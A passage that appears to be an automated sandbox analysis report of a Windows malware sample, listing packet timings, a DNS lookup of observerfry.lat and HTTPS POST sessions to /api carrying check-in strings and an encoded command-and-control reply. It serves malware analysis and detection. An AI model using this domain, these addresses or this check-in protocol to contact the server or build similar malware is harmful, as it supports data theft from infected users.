                                                                                                            Dec 24, 2024 08:35:42.552428007 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:42.552438974 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:42.552680016 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:42.554383039 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:42.554522038 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:42.554553986 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:42.554619074 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:42.554627895 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:43.505132914 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:43.505767107 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:43.505861044 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:43.505947113 CET49734443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:43.505964994 CET44349734172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:43.911890984 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:43.911956072 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:43.912038088 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:43.912444115 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:43.912467003 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:45.127296925 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:45.127460003 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:45.130784988 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:45.130791903 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:45.131115913 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:45.134531975 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:45.134665966 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:45.134673119 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:45.894751072 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:45.894900084 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:45.895013094 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:45.895181894 CET49735443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:45.895204067 CET44349735172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:46.452487946 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:46.452538013 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:46.452673912 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:46.453039885 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:46.453058004 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.664216042 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.664336920 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.665733099 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.665740967 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.665987968 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.667479992 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.668256044 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.668289900 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.668407917 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.668442011 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.668546915 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.668581009 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.668699980 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.668745041 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.668888092 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.668925047 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.669070959 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.669101954 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.669111013 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.669126034 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.669255018 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.669281960 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.669303894 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.669433117 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.669462919 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.715327024 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.715492010 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.715544939 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.715579987 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.759342909 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:47.759469032 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.798788071 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:47.798809052 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:51.008187056 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:51.008312941 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:51.008414030 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:51.008579969 CET49737443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:51.008598089 CET44349737172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:51.058027029 CET49742443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:51.058074951 CET44349742172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:51.058160067 CET49742443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:51.058661938 CET49742443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:51.058675051 CET44349742172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:52.048836946 CET49742443192.168.2.4172.67.199.72

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 24, 2024 08:35:32.092535973 CET5919153192.168.2.41.1.1.1
                                                                                                            Dec 24, 2024 08:35:32.231178045 CET53591911.1.1.1192.168.2.4

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 24, 2024 08:35:32.092535973 CET192.168.2.41.1.1.10xedcaStandard query (0)observerfry.latA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 24, 2024 08:35:32.231178045 CET1.1.1.1192.168.2.40xedcaNo error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                            Dec 24, 2024 08:35:32.231178045 CET1.1.1.1192.168.2.40xedcaNo error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • observerfry.lat

                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.449730172.67.199.724437412C:\Users\user\Desktop\yO9EAqDV15.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-24 07:35:33 UTC262OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 8
                                                                                                            Host: observerfry.lat
                                                                                                            2024-12-24 07:35:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                            Data Ascii: act=life
                                                                                                            2024-12-24 07:35:34 UTC1129INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:34 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=am9h3i15tfaiu7e47qf2ovo8ec; expires=Sat, 19 Apr 2025 01:22:12 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1%2BTf2GjWyfmZx%2FFAyYkqJuwZaHxTUyhyGKu0%2Bc%2F3QGEL5tCtGv8HOdwTPRN10YkmPaxJ7gjuNlzvqRT435VjDMl32F6rklg220xT3hLdhjApIBxYhkAqn23v77%2BXW5wi%2Bw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eea53defb438c-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1634&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1716637&cwnd=245&unsent_bytes=0&cid=9bb441b54ebe4af8&ts=761&x=0"
                                                                                                            2024-12-24 07:35:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                            Data Ascii: 2ok
                                                                                                            2024-12-24 07:35:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.449731172.67.199.724437412C:\Users\user\Desktop\yO9EAqDV15.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-24 07:35:35 UTC263OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 47
                                                                                                            Host: observerfry.lat
                                                                                                            2024-12-24 07:35:35 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                            2024-12-24 07:35:36 UTC1121INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:36 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=rmb23bdepo7998kgetodker3jl; expires=Sat, 19 Apr 2025 01:22:14 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0QSJUItL5VWejKo3HLj5F9vPtqF4CF98xgHfiqmYHdre1Kgd8lk%2FTiXmArgMnv67BKZMi%2FJEo7NbHTRSE3YVGOR17Qipk5oZtFJ3wqhmaLtO1IFwA4MwJiSg5AjgbbSowcE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eea603b6643d9-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2188&min_rtt=2168&rtt_var=854&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1250535&cwnd=221&unsent_bytes=0&cid=bb1cc40a94a0f1af&ts=772&x=0"
                                                                                                            2024-12-24 07:35:36 UTC248INData Raw: 34 39 31 63 0d 0a 33 61 63 59 67 5a 57 53 48 66 32 64 38 37 62 56 68 51 32 33 59 6d 6d 68 34 33 49 6f 68 41 50 33 77 58 5a 4a 77 6e 56 6f 78 79 2b 6d 68 57 36 6a 72 36 59 78 33 2b 36 57 6c 4f 2f 78 66 38 49 48 52 59 4f 43 46 67 71 2b 5a 5a 61 74 42 53 7a 75 56 78 36 71 44 65 66 42 65 65 33 6d 39 7a 48 66 2b 49 75 55 37 39 35 32 6c 51 63 48 67 39 6c 51 54 65 35 68 6c 71 30 55 4b 4b 6b 61 47 4b 74 4d 74 63 74 2f 36 66 44 78 65 5a 7a 78 6e 74 4f 77 34 47 7a 64 44 41 44 4d 69 78 38 4b 71 43 47 53 75 31 52 7a 34 44 67 4e 73 30 36 51 78 6d 76 71 74 2b 38 78 68 72 2b 57 32 50 65 2f 4c 39 59 48 43 38 32 46 46 6b 50 73 61 35 2b 6c 46 53 32 6f 42 51 47 68 52 37 58 46 66 4f 6a 36 2b 47 32 52 2b 35 6e 59 74 75 70 73 6c 55 35 4c 78 4a 6c 51 45 71
                                                                                                            Data Ascii: 491c3acYgZWSHf2d87bVhQ23Ymmh43IohAP3wXZJwnVoxy+mhW6jr6Yx3+6WlO/xf8IHRYOCFgq+ZZatBSzuVx6qDefBee3m9zHf+IuU7952lQcHg9lQTe5hlq0UKKkaGKtMtct/6fDxeZzxntOw4GzdDADMix8KqCGSu1Rz4DgNs06Qxmvqt+8xhr+W2Pe/L9YHC82FFkPsa5+lFS2oBQGhR7XFfOj6+G2R+5nYtupslU5LxJlQEq
                                                                                                            2024-12-24 07:35:36 UTC1369INData Raw: 59 79 70 36 41 46 4f 72 55 61 47 71 4d 4e 6f 49 74 6a 6f 2f 44 38 50 38 65 2f 6d 64 69 35 34 6d 7a 61 42 77 72 44 6b 78 39 4b 35 57 6d 64 70 78 34 6b 72 78 67 45 72 30 71 33 7a 48 33 73 38 50 68 35 6b 50 7a 52 6d 76 66 67 64 35 56 59 53 2b 4f 52 45 30 6e 79 62 49 54 6a 43 32 57 35 56 77 32 70 44 65 65 46 66 4f 33 32 2f 58 2b 4e 39 35 72 66 73 76 56 6b 33 41 30 47 77 34 77 61 52 65 56 68 6b 71 6b 65 4a 4b 6f 54 42 36 68 4c 76 38 55 36 72 62 66 33 5a 39 2b 6e 30 66 65 79 39 32 6a 5a 46 6b 6e 35 77 51 38 45 2f 79 47 53 72 31 52 7a 34 42 38 50 70 6b 36 30 79 6e 6e 72 2f 4f 4a 2f 6a 66 6d 63 30 61 58 68 61 74 73 4b 43 4e 47 4c 48 6b 7a 6c 61 4a 36 71 45 53 79 6b 56 30 54 6c 53 71 65 46 49 71 50 57 2f 58 53 54 39 59 62 55 39 2f 67 68 7a 45 41 4d 7a 38 46 49 43
                                                                                                            Data Ascii: Yyp6AFOrUaGqMNoItjo/D8P8e/mdi54mzaBwrDkx9K5Wmdpx4krxgEr0q3zH3s8Ph5kPzRmvfgd5VYS+ORE0nybITjC2W5Vw2pDeeFfO32/X+N95rfsvVk3A0Gw4waReVhkqkeJKoTB6hLv8U6rbf3Z9+n0fey92jZFkn5wQ8E/yGSr1Rz4B8Ppk60ynnr/OJ/jfmc0aXhatsKCNGLHkzlaJ6qESykV0TlSqeFIqPW/XST9YbU9/ghzEAMz8FIC
                                                                                                            2024-12-24 07:35:36 UTC1369INData Raw: 6a 57 6d 75 6e 44 30 72 39 44 5a 58 47 62 75 44 39 73 6b 71 63 38 5a 2f 54 6f 61 64 77 6d 78 6c 4c 78 49 31 51 45 71 5a 73 6c 4b 73 53 4f 61 38 61 43 61 74 44 73 4d 42 31 36 2f 66 77 63 70 72 37 6d 74 2b 30 36 6d 76 48 43 67 76 4c 68 42 46 41 37 43 48 62 34 78 4d 7a 34 45 39 4b 6c 46 71 30 68 30 2f 67 2b 66 35 34 69 62 2b 4f 6d 71 36 6e 61 4e 6c 41 55 34 4f 4d 47 45 2f 6a 62 70 53 70 47 69 36 71 47 77 4b 72 54 71 33 4b 66 75 50 37 2b 48 57 53 38 5a 58 63 76 75 78 6b 30 77 41 4b 79 63 46 65 43 75 46 35 31 66 74 55 48 36 63 62 42 36 6f 50 69 73 5a 30 37 66 44 6d 50 34 43 78 69 4a 53 77 36 79 2b 4e 51 41 66 4b 67 52 74 41 34 6d 47 53 72 68 45 6f 70 78 51 48 6f 6b 65 78 77 6e 37 76 2f 76 31 35 6e 2f 69 56 30 61 58 69 5a 74 6b 4d 53 34 33 42 46 31 4b 6d 4f 64
                                                                                                            Data Ascii: jWmunD0r9DZXGbuD9skqc8Z/ToadwmxlLxI1QEqZslKsSOa8aCatDsMB16/fwcpr7mt+06mvHCgvLhBFA7CHb4xMz4E9KlFq0h0/g+f54ib+Omq6naNlAU4OMGE/jbpSpGi6qGwKrTq3KfuP7+HWS8ZXcvuxk0wAKycFeCuF51ftUH6cbB6oPisZ07fDmP4CxiJSw6y+NQAfKgRtA4mGSrhEopxQHokexwn7v/v15n/iV0aXiZtkMS43BF1KmOd
                                                                                                            2024-12-24 07:35:36 UTC1369INData Raw: 34 45 39 4b 72 45 53 74 79 33 54 71 2b 76 5a 33 6d 50 47 63 33 37 48 73 61 4e 49 47 42 73 75 4d 46 55 6e 6e 5a 5a 2b 78 46 79 43 71 47 67 44 6c 41 2f 2f 43 59 71 4f 76 73 46 69 54 31 6f 48 50 70 66 45 76 79 6b 34 53 67 34 59 63 43 72 34 68 6c 71 77 64 4a 4b 67 66 42 61 70 4a 73 63 4e 38 37 76 4c 2f 64 59 33 33 6e 39 6d 38 36 47 54 48 41 41 62 48 6a 52 52 43 37 57 76 56 37 56 51 73 75 46 64 53 35 58 69 79 79 6e 72 67 34 62 42 67 30 65 62 52 30 37 75 6e 4e 35 55 4d 42 63 4f 4f 48 45 62 74 61 5a 53 76 47 69 79 6c 48 67 4b 74 58 37 37 42 63 75 4c 35 2f 33 36 62 2b 70 54 51 73 4f 4e 70 32 6b 42 46 67 34 59 49 43 72 34 68 75 6f 51 68 61 59 45 74 53 72 6f 44 70 6f 56 39 37 37 65 6f 50 35 50 38 6e 64 79 34 34 57 62 5a 43 67 4c 49 6a 52 74 4f 36 6d 69 51 70 52 55
                                                                                                            Data Ascii: 4E9KrESty3Tq+vZ3mPGc37HsaNIGBsuMFUnnZZ+xFyCqGgDlA//CYqOvsFiT1oHPpfEvyk4Sg4YcCr4hlqwdJKgfBapJscN87vL/dY33n9m86GTHAAbHjRRC7WvV7VQsuFdS5Xiyynrg4bBg0ebR07unN5UMBcOOHEbtaZSvGiylHgKtX77BcuL5/36b+pTQsONp2kBFg4YICr4huoQhaYEtSroDpoV977eoP5P8ndy44WbZCgLIjRtO6miQpRU
                                                                                                            2024-12-24 07:35:36 UTC1369INData Raw: 4b 4a 45 72 63 74 33 37 50 2f 34 64 70 37 37 6c 4e 6d 78 36 32 58 55 42 77 58 4e 69 56 41 45 70 6d 61 4e 34 30 78 72 67 51 63 52 74 31 75 79 35 48 66 73 74 2b 38 78 68 72 2b 57 32 50 65 2f 4c 39 77 53 44 38 36 54 47 55 33 6f 62 70 61 78 46 53 61 72 42 51 32 71 53 62 6a 4a 66 4f 7a 78 38 58 71 56 38 35 62 52 76 4f 68 6a 6c 55 35 4c 78 4a 6c 51 45 71 5a 50 6e 72 41 44 4b 4b 34 63 48 4c 34 4e 6f 49 74 6a 6f 2f 44 38 50 38 65 2f 6b 74 2b 38 34 32 2f 5a 41 41 2f 4f 67 51 4a 46 34 57 61 63 71 41 59 68 70 78 41 42 72 55 61 77 77 32 6a 76 2b 65 4a 36 6a 65 33 52 6d 76 66 67 64 35 56 59 53 2f 57 47 41 46 72 6c 49 36 53 31 46 7a 32 72 47 67 62 6c 55 76 48 63 4f 75 54 37 73 43 66 66 2b 5a 37 64 74 4f 68 75 33 41 77 47 78 6f 67 56 53 2b 42 6c 6e 36 6b 55 4c 61 59 57
                                                                                                            Data Ascii: KJErct37P/4dp77lNmx62XUBwXNiVAEpmaN40xrgQcRt1uy5Hfst+8xhr+W2Pe/L9wSD86TGU3obpaxFSarBQ2qSbjJfOzx8XqV85bRvOhjlU5LxJlQEqZPnrADKK4cHL4NoItjo/D8P8e/kt+842/ZAA/OgQJF4WacqAYhpxABrUaww2jv+eJ6je3Rmvfgd5VYS/WGAFrlI6S1Fz2rGgblUvHcOuT7sCff+Z7dtOhu3AwGxogVS+Bln6kULaYW
                                                                                                            2024-12-24 07:35:36 UTC1369INData Raw: 2f 43 64 71 4f 76 73 48 79 59 2f 4a 44 65 76 75 74 67 30 67 51 5a 79 59 59 43 53 2b 64 71 6d 4b 38 55 4a 71 30 64 43 36 78 41 73 38 68 39 35 50 6a 31 50 39 47 2f 6c 73 7a 33 76 79 2f 30 44 51 44 50 32 6b 6f 4b 2b 53 2b 4d 34 78 4d 6e 34 45 39 4b 70 55 65 36 7a 33 66 67 2b 50 4e 74 6e 76 6d 44 31 4c 72 74 66 64 38 4c 44 73 36 4d 48 55 6e 67 5a 35 36 76 42 69 4b 67 46 41 48 6c 41 2f 2f 43 59 71 4f 76 73 46 79 49 36 5a 76 54 75 2f 46 6b 31 41 4d 64 7a 70 46 51 42 4b 5a 77 6b 72 4a 55 63 37 59 48 48 61 4a 53 38 64 77 36 35 50 75 77 4a 39 2f 35 6d 4e 4b 77 34 57 48 48 42 51 33 4d 6a 68 6c 44 34 6d 6d 57 6f 78 41 76 70 78 49 4a 71 55 61 34 78 6e 58 6e 2f 76 35 32 6b 4c 2f 66 6c 4c 44 2f 4c 34 31 41 4b 74 69 43 48 45 65 6d 66 74 75 36 56 43 79 73 56 31 4c 6c 51
                                                                                                            Data Ascii: /CdqOvsHyY/JDevutg0gQZyYYCS+dqmK8UJq0dC6xAs8h95Pj1P9G/lsz3vy/0DQDP2koK+S+M4xMn4E9KpUe6z3fg+PNtnvmD1Lrtfd8LDs6MHUngZ56vBiKgFAHlA//CYqOvsFyI6ZvTu/Fk1AMdzpFQBKZwkrJUc7YHHaJS8dw65PuwJ9/5mNKw4WHHBQ3MjhlD4mmWoxAvpxIJqUa4xnXn/v52kL/flLD/L41AKtiCHEemftu6VCysV1LlQ
                                                                                                            2024-12-24 07:35:36 UTC1369INData Raw: 6f 34 66 56 34 69 62 32 6b 31 37 6e 70 61 4d 4e 41 46 50 7a 50 55 45 58 38 49 63 32 61 44 57 75 6e 47 30 72 39 44 61 72 43 65 75 54 74 35 6e 69 54 37 70 72 5a 75 38 56 67 30 68 59 49 7a 49 49 42 51 36 70 71 6d 4f 4e 61 61 36 63 50 53 76 30 4e 6b 4d 4a 73 34 4e 6a 7a 62 70 61 2f 33 35 53 77 38 53 2b 4e 51 44 57 44 6b 78 4e 61 35 57 36 45 6e 56 52 7a 75 53 6c 4b 72 6c 75 34 31 58 6e 31 2f 50 31 7a 6a 73 48 52 6a 4f 4f 31 50 59 64 53 57 64 7a 42 44 33 57 6f 49 5a 54 6a 54 42 4b 35 56 78 7a 6c 46 65 32 4c 4f 76 47 33 71 44 2f 59 2f 49 50 47 73 65 52 35 31 6b 63 31 2f 61 59 47 51 4f 46 78 6b 72 51 62 61 2b 35 58 42 65 55 56 68 6f 56 7a 35 4f 7a 68 61 5a 4c 76 6c 70 53 49 71 53 2f 4e 51 46 4f 44 74 42 4e 45 36 47 61 44 73 6c 6b 4d 74 68 30 4e 74 55 71 6f 79 6a
                                                                                                            Data Ascii: o4fV4ib2k17npaMNAFPzPUEX8Ic2aDWunG0r9DarCeuTt5niT7prZu8Vg0hYIzIIBQ6pqmONaa6cPSv0NkMJs4Njzbpa/35Sw8S+NQDWDkxNa5W6EnVRzuSlKrlu41Xn1/P1zjsHRjOO1PYdSWdzBD3WoIZTjTBK5VxzlFe2LOvG3qD/Y/IPGseR51kc1/aYGQOFxkrQba+5XBeUVhoVz5OzhaZLvlpSIqS/NQFODtBNE6GaDslkMth0NtUqoyj
                                                                                                            2024-12-24 07:35:36 UTC1369INData Raw: 64 4a 2f 34 67 63 4b 73 71 32 66 57 47 68 48 39 76 7a 74 47 34 47 61 50 70 42 49 4e 67 46 64 45 35 55 4c 2f 6e 55 4f 6a 76 37 42 41 30 62 2b 4a 6c 4f 2b 6e 57 74 59 4f 42 63 53 58 41 51 66 4f 51 71 2b 5a 56 67 65 6e 41 6b 69 52 53 71 2f 55 63 65 37 37 73 44 48 66 2b 64 47 4d 35 36 6b 76 30 52 46 4c 6d 39 46 43 45 62 4d 79 77 76 4e 47 4e 4f 34 4f 53 72 4d 4e 35 35 63 30 6f 2b 57 77 4a 39 2b 34 6b 73 61 6c 34 57 7a 44 41 30 7a 39 76 7a 64 45 34 57 43 44 73 77 4d 6b 6e 69 6b 66 70 6b 4f 78 77 6d 7a 79 74 37 34 2f 6b 4c 2f 4a 37 66 65 76 4c 2b 70 4f 53 39 76 42 53 41 72 54 59 70 75 74 45 7a 32 78 57 69 32 72 53 72 37 54 61 76 54 34 73 44 48 66 2b 64 47 4d 35 61 6b 76 30 52 46 4c 6d 39 46 43 45 62 4d 79 77 76 4e 47 4e 4f 34 4f 53 72 4d 4e 35 35 63 30 6f 2b 57
                                                                                                            Data Ascii: dJ/4gcKsq2fWGhH9vztG4GaPpBINgFdE5UL/nUOjv7BA0b+JlO+nWtYOBcSXAQfOQq+ZVgenAkiRSq/Uce77sDHf+dGM56kv0RFLm9FCEbMywvNGNO4OSrMN55c0o+WwJ9+4ksal4WzDA0z9vzdE4WCDswMknikfpkOxwmzyt74/kL/J7fevL+pOS9vBSArTYputEz2xWi2rSr7TavT4sDHf+dGM5akv0RFLm9FCEbMywvNGNO4OSrMN55c0o+W
                                                                                                            2024-12-24 07:35:36 UTC1369INData Raw: 49 66 58 39 36 6b 76 32 55 42 54 67 34 41 61 57 75 74 75 6b 75 38 54 4d 61 64 58 52 4f 56 44 2f 35 30 36 34 76 33 67 63 70 44 34 33 64 4b 35 36 53 2f 4b 54 68 4b 44 6c 31 41 53 74 53 2f 56 73 56 52 7a 34 46 41 4a 74 31 2b 35 78 6d 7a 67 73 4d 35 42 73 75 32 57 78 4c 53 6c 58 74 67 45 48 64 61 43 41 45 33 59 58 37 69 78 45 7a 75 6a 56 54 75 7a 54 72 2f 4c 66 61 4f 35 73 47 66 66 70 39 48 35 70 65 42 2f 31 6b 42 46 67 34 31 51 45 71 5a 73 68 36 51 45 4b 4f 77 51 45 4b 49 4e 6f 49 74 6a 6f 2b 47 77 4a 38 79 78 30 63 62 33 76 79 2b 53 44 67 62 43 67 68 35 4a 39 48 4f 54 6f 41 49 6f 35 79 6b 30 69 46 2b 34 31 58 6d 68 78 76 31 37 69 65 71 53 78 4c 44 5a 55 66 67 53 44 4e 4f 43 55 6d 62 68 62 4a 6d 64 4b 68 79 78 45 42 72 6e 61 37 7a 54 65 61 4f 35 73 47 66 66
                                                                                                            Data Ascii: IfX96kv2UBTg4AaWutuku8TMadXROVD/5064v3gcpD43dK56S/KThKDl1AStS/VsVRz4FAJt1+5xmzgsM5Bsu2WxLSlXtgEHdaCAE3YX7ixEzujVTuzTr/LfaO5sGffp9H5peB/1kBFg41QEqZsh6QEKOwQEKINoItjo+GwJ8yx0cb3vy+SDgbCgh5J9HOToAIo5yk0iF+41Xmhxv17ieqSxLDZUfgSDNOCUmbhbJmdKhyxEBrna7zTeaO5sGff


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.449732172.67.199.724437412C:\Users\user\Desktop\yO9EAqDV15.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-24 07:35:38 UTC277OUTPOST /api HTTP/1.1
